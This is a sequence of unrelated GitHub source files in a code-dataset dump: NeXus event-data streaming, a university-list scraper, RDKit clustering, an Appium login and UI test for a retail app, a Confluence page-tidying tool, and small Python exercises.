\n","repo_name":"Johnkhk/Algorithms","sub_path":"contests/weekly_316.py","file_name":"weekly_316.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"4232523085","text":"import h5py\nfrom typing import Tuple, Optional, Generator, Callable, Union\nimport numpy as np\nfrom .application_logger import get_logger\nfrom .convert_units import (\n get_to_nanoseconds_conversion_method,\n iso8601_to_ns_since_epoch,\n)\nfrom pint.errors import UndefinedUnitError\nfrom .source_error import BadSource\n\n\nclass _ChunkDataLoader:\n def __init__(self, dataset: h5py.Dataset):\n self._dataset = dataset\n self._chunk_iterator = self._dataset.iter_chunks()\n next_slice = next(self._chunk_iterator)\n self._current_chunk = self._dataset[next_slice]\n self._start_index: int = 0\n\n def get_data_for_pulse(\n self, pulse_start_event: int, pulse_end_event: int\n ) -> np.ndarray:\n start_index = int(pulse_start_event - self._start_index)\n end_index = int(pulse_end_event - self._start_index)\n\n data_for_pulse = np.array([], dtype=self._current_chunk.dtype)\n while True:\n # If all the data we need is in the current, cached chunk,\n # then just append and return it\n if end_index < self._current_chunk.size:\n return np.append(\n data_for_pulse, self._current_chunk[start_index:end_index]\n )\n # else...\n # we need all the data in the current chunk...\n data_for_pulse = np.append(\n data_for_pulse, self._current_chunk[start_index:]\n )\n # and at least some from the next chunk, so load the next chunk and continue\n end_index -= self._current_chunk.size\n start_index = 0\n self._start_index += self._current_chunk.size\n try:\n next_slice = next(self._chunk_iterator)\n except StopIteration:\n return data_for_pulse\n self._current_chunk = self._dataset[next_slice]\n\n\nclass _ContiguousDataLoader:\n def __init__(self, dataset: h5py.Dataset):\n self._dataset = dataset\n max_bytes_willing_to_load_into_memory = 100_000_000 # 100 MB\n if self._dataset.nbytes < max_bytes_willing_to_load_into_memory:\n self._dataset = self._dataset[...]\n elif self._dataset.compression is not None:\n get_logger().warning(\n f\"{self._dataset.name} is larger than {max_bytes_willing_to_load_into_memory} bytes,\"\n f\"contiguous and compressed, it will be very slow to stream if these event data are from many pulses\"\n )\n\n def get_data_for_pulse(\n self, pulse_start_event: int, pulse_end_event: int\n ) -> np.ndarray:\n return self._dataset[pulse_start_event:pulse_end_event]\n\n\n_DataLoader = Union[_ChunkDataLoader, _ContiguousDataLoader]\n\n\ndef _get_pulse_time_offset_in_ns(pulse_time_dataset: h5py.Group) -> int:\n \"\"\"\n Gives an offset which, when added to pulse times, results in time relative to unix epoch\n \"\"\"\n try:\n date_string = pulse_time_dataset.attrs[\"offset\"]\n except KeyError:\n # If no \"offset\" attribute then times are already relative to unix epoch according to NeXus standard\n return 0\n return iso8601_to_ns_since_epoch(date_string)\n\n\nclass EventDataSource:\n def __init__(self, group: h5py.Group):\n \"\"\"\n Load data, one pulse at a time from NXevent_data in NeXus file\n :raises BadSource if there is a critical problem with the data source\n \"\"\"\n self._group = group\n self._logger = get_logger()\n self._tof_loader: _DataLoader\n self._id_loader: _DataLoader\n\n if self._has_missing_fields():\n raise BadSource()\n try:\n self._convert_pulse_time = _get_pulse_time_unit_converter(group)\n self._convert_event_time = self._get_event_time_unit_converter()\n except UndefinedUnitError:\n self._logger.error(\n f\"Unable to publish data from NXevent_data at {self._group.name} due to unrecognised \"\n f\"or missing units for time field\"\n )\n raise BadSource()\n\n self._event_time_zero = self._group[\"event_time_zero\"][...]\n self._event_index = self._group[\"event_index\"][...]\n\n # There is some variation in the last recorded event_index in files from different institutions\n # for example ISIS files often have what would be the first index of the next pulse at the end.\n # This logic hopefully covers most cases\n if self._event_index[-1] < self._group[\"event_id\"].len():\n self._event_index = np.append(\n self._event_index,\n np.array([self._group[\"event_id\"].len() - 1]).astype(\n self._event_index.dtype\n ),\n )\n else:\n self._event_index[-1] = self._group[\"event_id\"].len()\n\n try:\n self._group[\"event_time_offset\"].iter_chunks()\n self._tof_loader = _ChunkDataLoader(self._group[\"event_time_offset\"])\n except TypeError:\n self._tof_loader = _ContiguousDataLoader(self._group[\"event_time_offset\"])\n\n try:\n self._group[\"event_id\"].iter_chunks()\n self._id_loader = _ChunkDataLoader(self._group[\"event_id\"])\n except TypeError:\n self._id_loader = _ContiguousDataLoader(self._group[\"event_id\"])\n\n self._pulse_time_offset_ns = _get_pulse_time_offset_in_ns(\n self._group[\"event_time_zero\"]\n )\n\n @property\n def final_timestamp(self) -> int:\n # Last pulse time is good enough, we won't try to find the last event in the last pulse\n return (\n self._convert_pulse_time(self._event_time_zero[-1])\n + self._pulse_time_offset_ns\n )\n\n def get_data(\n self,\n ) -> Generator[Tuple[Optional[np.ndarray], Optional[np.ndarray], int], None, None]:\n \"\"\"\n Returns None instead of a data when there is no more data\n \"\"\"\n # -1 as last index would be start of the next pulse after the end of the run\n for pulse_number in range(self._event_index.size - 1):\n pulse_time = (\n self._convert_pulse_time(self._event_time_zero[pulse_number])\n + self._pulse_time_offset_ns\n )\n start_event = self._event_index[pulse_number]\n end_event = self._event_index[pulse_number + 1]\n yield self._convert_event_time(\n self._tof_loader.get_data_for_pulse(start_event, end_event)\n ), self._id_loader.get_data_for_pulse(start_event, end_event), pulse_time\n yield None, None, 0\n\n def _has_missing_fields(self) -> bool:\n missing_field = False\n required_fields = (\n \"event_time_zero\",\n \"event_index\",\n \"event_id\",\n \"event_time_offset\",\n )\n for field in required_fields:\n if field not in self._group:\n self._logger.error(\n f\"Unable to publish data from NXevent_data at {self._group.name} due to missing {field} field\"\n )\n missing_field = True\n return missing_field\n\n def _get_event_time_unit_converter(self) -> Callable:\n try:\n units = self._group[\"event_time_offset\"].attrs[\"units\"]\n except AttributeError:\n raise UndefinedUnitError\n return get_to_nanoseconds_conversion_method(units)\n\n @property\n def name(self):\n return self._group.name.split(\"/\")[-1]\n\n\ndef _get_pulse_time_unit_converter(group: h5py.Group) -> Callable:\n try:\n units = group[\"event_time_zero\"].attrs[\"units\"]\n except AttributeError:\n raise UndefinedUnitError\n return get_to_nanoseconds_conversion_method(units)\n\n\nclass FakeEventDataSource:\n def __init__(self, group: h5py.Group, events_per_pulse: int):\n logger = get_logger()\n try:\n self._detector_ids = group.parent[\"detector_number\"][...]\n except KeyError:\n logger.error(\n \"detector_number dataset not found in parent group of \"\n \"NXevent_data, this must be present when using \"\n \"--fake-events-per-pulse\"\n )\n raise BadSource()\n self._events_per_pulse = events_per_pulse\n\n self._event_time_zero = group[\"event_time_zero\"][...]\n self._convert_pulse_time = _get_pulse_time_unit_converter(group)\n\n self._pulse_time_offset_ns = _get_pulse_time_offset_in_ns(\n group[\"event_time_zero\"]\n )\n self._rng = np.random.default_rng(12345)\n\n self.name = group.name.split(\"/\")[-1]\n\n @property\n def final_timestamp(self) -> int:\n # Last pulse time is good enough, we won't try to find the last event in the last pulse\n return (\n self._convert_pulse_time(self._event_time_zero[-1])\n + self._pulse_time_offset_ns\n )\n\n def get_data(\n self,\n ) -> Generator[Tuple[Optional[np.ndarray], Optional[np.ndarray], int], None, None]:\n \"\"\"\n Returns None instead of a data when there is no more data\n \"\"\"\n for pulse_number in range(self._event_time_zero.size):\n pulse_time = (\n self._convert_pulse_time(self._event_time_zero[pulse_number])\n + self._pulse_time_offset_ns\n )\n\n tofs = self._rng.integers(\n low=10000, high=10000000, size=self._events_per_pulse\n )\n detector_num_indices = self._rng.integers(\n low=0, high=self._detector_ids.size, size=self._events_per_pulse\n )\n ids = self._detector_ids[detector_num_indices]\n\n yield tofs, ids, pulse_time\n yield None, None, 0\n","repo_name":"ess-dmsc/nexus-streamer-python","sub_path":"src/nexus_streamer/event_data_source.py","file_name":"event_data_source.py","file_ext":"py","file_size_in_byte":9747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"43159973133","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\n\nfrom scraper_util import *\n\nif __name__ == '__main__':\n csv_out = csv.writer(open(\"universities.csv\", \"a\"))\n csv_out.writerow([\"UNIVERSITY\", \"URL\", \"STATE\"])\n start = 1\n while start < 2100:\n raw_html = getRawHtml(\"http://univ.cc/search.php?dom=edu&key=&start=%s\" % start)\n bs_struct = BeautifulSoup(raw_html, \"html.parser\")\n for institution in bs_struct.find_all('li'):\n links = institution.find_all('a', href=True)\n if len(links) != 0:\n link = links[0]\n university_name = link.text.encode('utf-8')\n url = link['href'].encode('utf-8')\n csv_out.writerow([university_name, url])\n start += 50\n\n\n\n\n\n\n","repo_name":"tristantao/burster","sub_path":"gen_university.py","file_name":"gen_university.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22474529441","text":"from utilidadesCeV.menu import *\nfrom utilidadesCeV.arquivo import *\n\n\nArq = 'Desafios\\\\arquivo01Exercicio115.txt'\nif arquivoExiste(Arq):\n print('Arquivo Localizado.')\nelse:\n criarArquivo(Arq)\n print(f'Arquivo {Arq} Criado com Sucesso.')\n \n\nwhile True:\n n = menu(['Cadastrar Pessoas','Lista de Pessoas','Sair do Sistema'])\n if n == 3:\n final()\n break\n elif n == 1:\n cabecalho('Cadastrar Pessoas')\n nome = str(input('Nome: ')).title().strip() \n idade = leiaInt('Idade: ')\n cadastrarPessoa(Arq, nome, idade)\n elif n == 2:\n cabecalho('Lista de Pessoas')\n lerArquivo(Arq)\n else:\n cabecalho('Opção Invalida!')","repo_name":"josivantarcio/Desafios-em-Python","sub_path":"Desafios/desafio115.py","file_name":"desafio115.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30678572138","text":"from __future__ import print_function\n\nimport argparse\nimport collections\nimport uuid\n\nfrom rdkit import rdBase\n\nfrom . import cluster_butina\nfrom pipelines_utils import parameter_utils, utils\nfrom pipelines_utils_rdkit import rdkit_utils\n\n### start field name defintions #########################################\n\nfield_Similarity = \"Similarity\"\n\n### functions #########################################\n\n\ndef MapClusterToMols(clusters, mols):\n i = 0\n for cluster in clusters:\n print(\"Cluster:\", i, cluster)\n for c in cluster:\n # print(\"Assigning mol\",c,\"to cluster\",i)\n mols[c].SetIntProp(\"Cluster\", i)\n i += 1\n j = 0\n for mol in mols:\n mol.SetIntProp(\"MolNum\", j)\n j += 1\n # print(mol.GetPropsAsDict())\n\ndef MapClusterToMols(clusters, mols):\n i = 0\n for cluster in clusters:\n print(\"Cluster:\", i, cluster)\n for c in cluster:\n # print(\"Assigning mol\",c,\"to cluster\",i)\n mols[c].SetIntProp(\"Cluster\", i)\n i += 1\n j = 0\n for mol in mols:\n mol.SetIntProp(\"MolNum\", j)\n j += 1\n # print(mol.GetPropsAsDict())\n\n\ndef GetDistance(x, y, matrix):\n if x == y:\n return 1.0\n if x > y:\n x2 = y\n y2 = x\n else:\n x2 = x\n y2 = y\n # print(\"row\",\",\".join([\"%.2f\" % x for x in matrix[y2-1]]))\n return matrix[y2 - 1][x2]\n\n\ndef GenerateId(cluster, structure):\n row = \"%03i\" % cluster\n row += \".\"\n row += \"%04i\" % structure\n return row\n\n\n### start main execution #########################################\n\ndef main():\n\n ### command line args defintions #########################################\n\n parser = argparse.ArgumentParser(description='RDKit Butina Cluster Matrix')\n parameter_utils.add_default_input_args(parser)\n parser.add_argument('-o', '--output', help=\"Base name for output file (no extension). If not defined then SDTOUT is used for the structures and output is used as base name of the other files.\")\n parser.add_argument('-of', '--outformat', choices=['tsv', 'json'], default='tsv', help=\"Output format. Defaults to 'tsv'.\")\n parser.add_argument('--meta', action='store_true', help='Write metadata and metrics files')\n parser.add_argument('-t', '--threshold', type=float, default=0.7, help='Similarity clustering threshold (1.0 means identical)')\n parser.add_argument('-mt', '--matrixThreshold', type=float, default=0.5, help='Threshold for outputting values (1.0 means identical)')\n parser.add_argument('-d', '--descriptor', type=str.lower, choices=list(cluster_butina.descriptors.keys()), default='rdkit', help='descriptor or fingerprint type (default rdkit)')\n parser.add_argument('-m', '--metric', type=str.lower, choices=list(cluster_butina.metrics.keys()), default='tanimoto', help='similarity metric (default tanimoto)')\n parser.add_argument('-q', '--quiet', action='store_true', help='Quiet mode')\n\n args = parser.parse_args()\n utils.log(\"Cluster Matrix Args: \", args)\n\n descriptor = cluster_butina.descriptors[args.descriptor]\n if descriptor is None:\n raise ValueError('Invalid descriptor name ' + args.descriptor)\n\n input,suppl = rdkit_utils.default_open_input(args.input, args.informat)\n\n # handle metadata\n source = \"cluster_butina_matrix.py\"\n datasetMetaProps = {\"source\":source, \"description\": \"Butina clustering using RDKit \" + rdBase.rdkitVersion}\n clsMappings = {\n \"Cluster1\": \"java.lang.Integer\",\n \"Cluster2\": \"java.lang.Integer\",\n \"ID1\": \"java.lang.String\",\n \"ID2\": \"java.lang.String\",\n \"M1\": \"java.lang.String\",\n \"M2\": \"java.lang.String\",\n \"Similarity\": \"java.lang.Float\"\n }\n fieldMetaProps = [{\"fieldName\":\"Cluster\", \"values\": {\"source\":source, \"description\":\"Cluster number\"}}]\n\n fieldNames = collections.OrderedDict()\n fieldNames['ID1'] = 'ID1'\n fieldNames['ID2'] ='ID2'\n fieldNames['Cluster1'] = 'Cluster1'\n fieldNames['Cluster2'] = 'Cluster2'\n fieldNames['Similarity'] = 'Similarity'\n fieldNames['M1'] = 'M1'\n fieldNames['M2'] = 'M2'\n\n writer,output_base = utils.\\\n create_simple_writer(args.output, 'cluster_butina_matrix',\n args.outformat, fieldNames,\n valueClassMappings=clsMappings,\n datasetMetaProps=datasetMetaProps,\n fieldMetaProps=fieldMetaProps)\n\n\n ### generate fingerprints\n mols = [x for x in suppl if x is not None]\n fps = [descriptor(x) for x in mols]\n input.close()\n\n\n ### do clustering\n utils.log(\"Clustering with descriptor\", args.descriptor, \"metric\", args.metric, \"and threshold\", args.threshold)\n clusters, dists, matrix, = cluster_butina.ClusterFps(fps, args.metric, 1.0 - args.threshold)\n utils.log(\"Found\", len(clusters), \"clusters\")\n\n MapClusterToMols(clusters, mols)\n\n if not args.quiet:\n utils.log(\"Clusters:\", clusters)\n\n writer.writeHeader()\n\n size = len(matrix)\n #utils.log(\"len(matrix):\", size)\n count = 0\n for i in range(size ):\n #utils.log(\"element\",i, \"has length\", len(matrix[i]))\n writer.write(create_values(mols, i, i, 1.0))\n count += 1\n for j in range(len(matrix[i])):\n #utils.log(\"writing\",i,j)\n dist = matrix[i][j]\n if dist > args.matrixThreshold:\n # the matrix is the lower left segment without the diagonal\n x = j\n y = i + 1\n writer.write(create_values(mols, x, y, dist))\n writer.write(create_values(mols, y, x, dist))\n count += 2\n writer.write(create_values(mols, size, size, 1.0))\n\n writer.writeFooter()\n writer.close()\n\n if args.meta:\n utils.write_metrics(output_base, {'__InputCount__':i, '__OutputCount__':count, 'RDKitCluster':i})\n\n\ndef create_values(mols, x, y, dist):\n c1 = mols[x].GetIntProp(\"Cluster\")\n c2 = mols[y].GetIntProp(\"Cluster\")\n bo = collections.OrderedDict()\n bo[\"uuid\"] = str(uuid.uuid4())\n props = {}\n props[\"Cluster1\"] = c1 + 1\n props[\"Cluster2\"] = c2 + 1\n props[\"ID1\"] = GenerateId(c1 + 1, x + 1)\n props[\"ID2\"] = GenerateId(c2 + 1, y + 1)\n props[field_Similarity] = dist\n if mols[x].HasProp(\"uuid\"):\n props[\"M1\"] = mols[x].GetProp(\"uuid\")\n if mols[y].HasProp(\"uuid\"):\n props[\"M2\"] = mols[y].GetProp(\"uuid\")\n\n return props\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"InformaticsMatters/pipelines","sub_path":"src/python/pipelines/rdkit/cluster_butina_matrix.py","file_name":"cluster_butina_matrix.py","file_ext":"py","file_size_in_byte":6505,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"} +{"seq_id":"13918987275","text":"import time\nfrom appium.webdriver.common.touch_action import TouchAction\nfrom appium import webdriver\nfrom Appium_Test.mainfunction import Slide, BasicMethods\nfrom Auto_Scripts.公共��法 import Login\nfrom Appium_Test.UI流程方法 import BusProcess\nfrom Appium_Test import global_varibals\n\nLogin = Login(headers=global_varibals.headers, data=global_varibals.data)\n\"\"\"\nActivity是Android系统中的四大组件之一,可以用于显示View\n我们的智零售启动appActivity在Appium调试的时候发现必须得用通过APK包解出来的【launchable-activity】,其他页面启动会报错\n配置如下:\ncaps[\"appActivity\"] = \"com.joowing.app.activity.MainActivity\" \n\"\"\"\n#\nloading_id = 'com.joowing.nebula.online:id/center'\naccount_login_id = \"com.joowing.nebula.online:id/account_login\"\nlogin_phone_id = 'com.joowing.nebula.online:id/phone'\n# 客服按钮\niv_helper_id = 'com.joowing.nebula.online:id/iv_helper_icon'\naccount_login_json = {\n 'account_name': global_varibals.account_name,\n 'account_password': global_varibals.account_password\n}\nphone_login_json = {\n 'phone': global_varibals.phone,\n 'org_code': global_varibals.org_code\n}\n\n\n# 前置代码:Appium启动参数\ndef appium_start():\n caps = {}\n caps[\"platformName\"] = \"Android\"\n caps[\"platformVersion\"] = \"10\"\n caps[\"deviceName\"] = \"Redmi_K20_Pro_Premium_Edition\"\n caps[\"appPackage\"] = \"com.joowing.nebula.online\"\n caps[\"appActivity\"] = \"com.joowing.app.activity.MainActivity\"\n # caps[\"noReset\"] 为False时,每次调试app时会默认重置app状态为对应acctivity入口,为True则按照打开调试app时app的当前入口来操作\n caps[\"noReset\"] = False\n caps[\"ensureWebviewsHavePages\"] = True\n # 一定要开启Appium的服务\n driver = webdriver.Remote(\"http://127.0.0.1:4723/wd/hub\", caps)\n return driver\n\n\n# 准备实例化\ndriver = appium_start()\ndriver.implicitly_wait(20)\nSlider = Slide(driver)\nBusProcess = BusProcess(driver)\nBasicMethods = BasicMethods(driver)\n\n\n# 账号密码登录\ndef account_login(info):\n choose_id_click = BasicMethods.choose_id_click(account_login_id)\n # 模拟登录智零售后通过账号密码登录的操作,由于我的手机进入账号密码登录页面后会自动跳出可选择的账号,会影响元素定位,所以随便点个地方取消账号选择\n TouchAction(driver).tap(x=646, y=1119).perform()\n name = info['account_name']\n password = info['account_password']\n test1 = driver.find_elements_by_id(\"com.joowing.nebula.online:id/user_name\")\n # print(test1, test1[0].text)\n test1[0].send_keys(name)\n time.sleep(1)\n TouchAction(driver).tap(x=646, y=1119).perform()\n driver.find_elements_by_id(\"com.joowing.nebula.online:id/password\")[0].send_keys(password)\n login_button_id = 'com.joowing.nebula.online:id/login_button'\n driver.find_elements_by_id(login_button_id)[0].click()\n time.sleep(8)\n TouchAction(driver).tap(x=745, y=160).perform()\n\n\n# 手机号获取验证码登录\ndef phone_login(phone_login_info):\n user_captcha = \"\"\n org_code = phone_login_info['org_code']\n phone = phone_login_info['phone']\n phone_index = str(phone)[-4:]\n driver.find_element_by_id(login_phone_id).send_keys(phone)\n driver.find_element_by_id('com.joowing.nebula.online:id/captchaButton').click()\n index_url = f'http://jmp.joowing.com/api/ris/global/user_captcha/all_captcha?org_code={org_code}&phone_index={phone_index}'\n Jmp_Seeion = Login.JMP_Login()\n time.sleep(5)\n user_captcha_list = Jmp_Seeion.get(index_url).json()\n # print(Jmp_Seeion.get(index_url).json())\n if len(user_captcha_list) == 0:\n print('未查询到手机号!请确认手机号是否唯一')\n exit()\n else:\n user_captcha = user_captcha_list[0]['captcha']\n driver.find_element_by_id('com.joowing.nebula.online:id/captcha').send_keys(user_captcha)\n driver.find_element_by_id('com.joowing.nebula.online:id/login_button').click()\n\n\n# -----------------------------后台管理员账户登录以及UI验证流程-------------------------\ndef administrators_ui():\n account_login(account_login_json)\n # 下拉刷新下数据\n Slider.swipeDown()\n c1 = BusProcess.show_sales()\n if c1:\n print('管理员一级面板数据展示正常!')\n else:\n print(\"检测管理员一级面板数据展示异常!\")\n Slider.swipeLeft()\n Slider.swipeUp()\n c2 = BusProcess.show_sales()\n if c2:\n print('店长一级面板数据展示正常!')\n if c1:\n print(\"--------------一级面板数据验证完毕--------------------\")\n else:\n print(\"检测店长一级面板数据展示异常!\")\n Slider.swipeRight()\n\n\n# ------------------------------导购手机号登录以及UI验证流程---------------------------\ndef guider_ui():\n phone_login(phone_login_json)\n BusProcess.guider_login()\n\n\n# noinspection PyBroadException\ntry:\n administrators_ui()\n BusProcess.secondary_panel()\n BusProcess.third_panel()\nexcept Exception as e:\n print(\"--------------一级面板UI验证异常!见异常截图-------------------\")\n driver = appium_start()\n driver.implicitly_wait(20)\n Slider = Slide(driver)\n administrators_ui()\n BusProcess.secondary_panel()\n BusProcess.third_panel()\n","repo_name":"Ring5S/yuhao_Testcase","sub_path":"Appium_Test/nebula_ui.py","file_name":"nebula_ui.py","file_ext":"py","file_size_in_byte":5315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"20311562458","text":"from __future__ import absolute_import, unicode_literals, print_function\n\nimport re\nimport difflib\ntry:\n import html.entities as htmlentitydefs\nexcept ImportError: # Python 2\n import htmlentitydefs # pylint: disable=import-error,wrong-import-order\nfrom xml.sax.saxutils import quoteattr # pylint: disable=wrong-import-order\n\nimport arrow\nfrom munch import munchify as bunchify\nfrom lxml.etree import fromstring, HTMLParser, XMLParser, XMLSyntaxError # pylint: disable=no-name-in-module\nfrom rudiments.reamed import click\n\nfrom .._compat import BytesIO\n\n\n# Mapping of CLI content format names to Confluence API names\nCLI_CONTENT_FORMATS = dict(view='view', editor='editor', storage='storage', export='export_view', anon='anonymous_export_view')\n\n# Simple replacement rules, order is important!\nTIDY_REGEX_RULES = ((_name, re.compile(_rule), _subst) for _name, _rule, _subst in [\n (\"FosWiki: Remove CSS class from section title\",\n r'<(h[1-5]) class=\"[^\"]*\">', r'<\\1>'),\n (\"FosWiki: Remove static section numbering\",\n r'(?<=)(|)[0-9.]+?\\s*(?= )', r'\\1'),\n (\"FosWiki: Empty anchor in headers\",\n r'(?<=)\\s* +', ''),\n (\"FosWiki: 'tok' spans in front of headers\",\n r'(?<=)(|)\\s* ', r'\\1'),\n (\"FosWiki: Section edit icons at the end of headers\",\n r'\\s*'\n r']+>'\n r'(?=)(|)\\s*'\n r'\\s*([^<]+)(?:)\\s*(?=)', r'\\1\\2'),\n (\"FosWiki: 'Edit Chapter Plugin' spans (new)\",\n r'(?<=)(|)\\s*'\n r'\\s*([^<]+)(?:)\\s*(?=)', r'\\1\\2'),\n (\"FosWiki: Residual leading whitespace in headers\",\n r'(?<=)(|)\\s* +', r'\\1'),\n (\"FosWiki: Replace TOC div with macro\",\n r'()?
.*?
', '''\n \n Contents\n \n

\n \n

\n
\n
'''),\n (\"FosWiki: Replace TOC in a Twisty with Expand+TOC macro\",\n r'
', '''\n \n Table of Contents\n \n

\n \n

\n
\n
'''),\n (\"FosWiki: Named anchors (#WikiWords)\",\n r'(]+>[^<]+)',\n r'\\1\\2; float: right;\\3'),\n (\"FosWiki: Wrap HTML '
' into 'panel' macro\",\n     r'(?)()',\n     r''\n     r'#eeeeee'\n     r''\n     r'\\1'),\n    (\"FosWiki: Wrap HTML '
' into 'panel' macro\",\n r'(?!)', ''),\n (\"FosWiki: Embedded CSS - custom list indent\",\n r'
    ', '
      '),\n (\"FosWiki: Empty paragraphs\",\n r'

       

      ', r''),\n (\"FosWiki: Obsolete CSS classes\",\n r'(<(?:div|p|span|h[1-5])) class=\"(foswikiTopic)\"', r'\\1'),\n])\n\n\ndef _apply_tidy_regex_rules(body, log=None):\n \"\"\"Return tidied body after applying regex rules.\"\"\"\n body = body.replace(u'\\u00A0', ' ')\n for name, rule, subst in TIDY_REGEX_RULES:\n length = len(body)\n try:\n body, count = rule.subn(subst, body)\n except re.error as cause:\n raise click.LoggedFailure('Error \"{}\" in \"{}\" replacement: {} => {}'.format(\n cause, name, rule.pattern, subst,\n ))\n if count and log:\n length -= len(body)\n log.info('Replaced %d matche(s) of \"%s\" (%d chars %s)',\n count, name, abs(length), \"added\" if length < 0 else \"removed\")\n return body\n\n\ndef _make_etree(body, content_format='storage', attrs=None):\n \"\"\"Create an ElementTree from a page's body.\"\"\"\n attrs = (attrs or {}).copy()\n attrs.update({\n 'xmlns:ac': 'http://www.atlassian.com/schema/confluence/4/ac/',\n 'xmlns:ri': 'http://www.atlassian.com/schema/confluence/4/ri/',\n })\n xml_body = re.sub(r'&(?!(amp|lt|gt|quot|apos))([a-zA-Z0-9]+);',\n lambda cref: '&#{};'.format(htmlentitydefs.name2codepoint[cref.group(2)]), body)\n #print(body.encode('utf8'))\n xmldoc = u'<{root} {attrs}>{body}'.format(\n root=content_format,\n attrs=' '.join('{}={}'.format(k, quoteattr(v)) for k, v in sorted(attrs.items())),\n body=xml_body)\n\n parser = (XMLParser if content_format == 'storage' else HTMLParser)(remove_blank_text=True)\n try:\n return fromstring(xmldoc, parser)\n except XMLSyntaxError as cause:\n raise click.LoggedFailure('{}\\n{}'.format(\n cause, '\\n'.join(['{:7d} {}'.format(i+1, k) for i, k in enumerate(xmldoc.splitlines())])\n ))\n\n\ndef _pretty_xml(body, content_format='storage', attrs=None):\n \"\"\"Pretty-print the given page body and return a list of lines.\"\"\"\n root = _make_etree(body, content_format=content_format, attrs=attrs)\n prettyfied = BytesIO()\n root.getroottree().write(prettyfied, encoding='utf8', pretty_print=True, xml_declaration=False)\n return prettyfied.getvalue().decode('utf8').splitlines()\n\n\nclass ConfluencePage(object):\n \"\"\"A page that holds enough state so it can be modified.\"\"\"\n\n DIFF_COLS = {\n '+': 'green',\n '-': 'red',\n '@': 'yellow',\n }\n\n def __init__(self, cf, url, markup='storage', expand=None):\n \"\"\" Load the given page.\n \"\"\"\n if expand and isinstance(expand, str):\n expand = expand.split(',')\n expand = set(expand or []) | {'space', 'version', 'body.' + markup}\n\n self.cf = cf\n self.url = url\n self.markup = markup\n self._data = cf.get(self.url, expand=','.join(expand))\n self.body = self._data.body[self.markup].value\n\n @property\n def page_id(self):\n \"\"\"The numeric page ID.\"\"\"\n return self._data.id\n\n @property\n def space_key(self):\n \"\"\"The space this page belongs to.\"\"\"\n return self._data.space.key\n\n @property\n def title(self):\n \"\"\"The page's title.\"\"\"\n return self._data.title\n\n @property\n def json(self):\n \"\"\"The full JSON response data.\"\"\"\n return self._data\n\n @property\n def version(self):\n \"\"\"The page's version number in history.\"\"\"\n return self._data.version.number\n\n def etree(self):\n \"\"\"Parse the page's body into an ElementTree.\"\"\"\n attrs = {\n 'id': 'page-' + self._data.id,\n 'href': self._data._links.base + (self._data._links.tinyui or ''),\n 'status': self._data.status,\n 'title': self._data.title,\n }\n return _make_etree(self.body, content_format=self.markup, attrs=attrs)\n\n def tidy(self, log=None):\n \"\"\"Return a tidy copy of this page's body.\"\"\"\n assert self.markup == 'storage', \"Can only clean up pages in storage format!\"\n return _apply_tidy_regex_rules(self.body, log=log)\n\n def update(self, body=None, minor=True):\n \"\"\"Update a page's content.\"\"\"\n assert self.markup == 'storage', \"Cannot update non-storage page markup!\"\n if body is None:\n body = self.body\n if body == self._data.body[self.markup].value:\n return # No changes\n\n data = {\n #'id': self._data.id,\n 'type': 'page',\n 'space': {'key': self.space_key},\n 'title': self.title,\n 'version': dict(number=self.version + 1, minorEdit=minor),\n 'body': {\n 'storage': {\n 'value': body,\n 'representation': self.markup,\n }\n },\n 'expand': 'version',\n }\n response = self.cf.session.put(self._data._links.self, json=data)\n response.raise_for_status()\n ##page = response.json(); print(page)\n result = bunchify(response.json())\n self._data.body[self.markup].value = body\n self._data.version = result.version\n return result\n\n\n def dump_diff(self, changed):\n \"\"\"Dump a diff to terminal between changed and stored body.\"\"\"\n if self.body == changed:\n click.secho('=== No changes to \"{0}\"'.format(self.title), fg='green')\n return\n\n diff = difflib.unified_diff(\n _pretty_xml(self.body, self.markup),\n _pretty_xml(changed, self.markup),\n u'v. {0} of \"{1}\"'.format(self.version, self.title),\n u'v. {0} of \"{1}\"'.format(self.version + 1, self.title),\n arrow.get(self._data.version.when).replace(microsecond=0).isoformat(sep=' '),\n arrow.now().replace(microsecond=0).isoformat(sep=' '),\n lineterm='', n=2)\n for line in diff:\n click.secho(line, fg=self.DIFF_COLS.get(line and line[0], None))\n","repo_name":"mam-dev/confluencer","sub_path":"src/confluencer/tools/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":9842,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"7"} +{"seq_id":"4184619568","text":"A = [1, 0, 2, 5, 7, 8]\r\nn = 3\r\ns = set()\r\n\r\nfor i in range(len(A)):\r\n\ttemp = n - A[i]\r\n\tif (temp in s):\r\n\t\tprint(\"(\"+str(A[i])+\",\"+str(temp)+\")\")\r\n\ts.add(A[i])\r\n\r\n\r\n#To find the max cosecutive ones\r\n\r\ndef maxConsequtiveOnes(String):\r\n if String == \"\" :\r\n return 0\r\n max_till_now = 0\r\n ones = []\r\n for i in String:\r\n if i == \"1\":\r\n max_till_now += 1\r\n if i == \"0\":\r\n max_till_now = 0\r\n ones.append(max_till_now)\r\n return max(ones)\r\nprint(maxConsequtiveOnes('101101111'))","repo_name":"shashankshet/PythonPracticePrograms","sub_path":"maxxonsecutiveones.py","file_name":"maxxonsecutiveones.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71137132705","text":"from cmath import nan\nfrom copy import deepcopy\nimport pandas as pd\nimport os,itertools,time,pulp\nfrom joblib import Parallel,delayed\n\ndef calcost(data1,data2):\n data1c=data1.loc['x':'z']\n data2c=data2.loc['x':'z']\n redata=data1c-data2c\n if data1.atom==data2.atom:\n return redata.x**2+redata.y**2+redata.z**2\n return 1000\n\ndef cal_distance_df(clusterdf1,clusterdf2,values=False,histgram=False,method='average',pair_atoms=False):\n cluster1=deepcopy(clusterdf1)\n 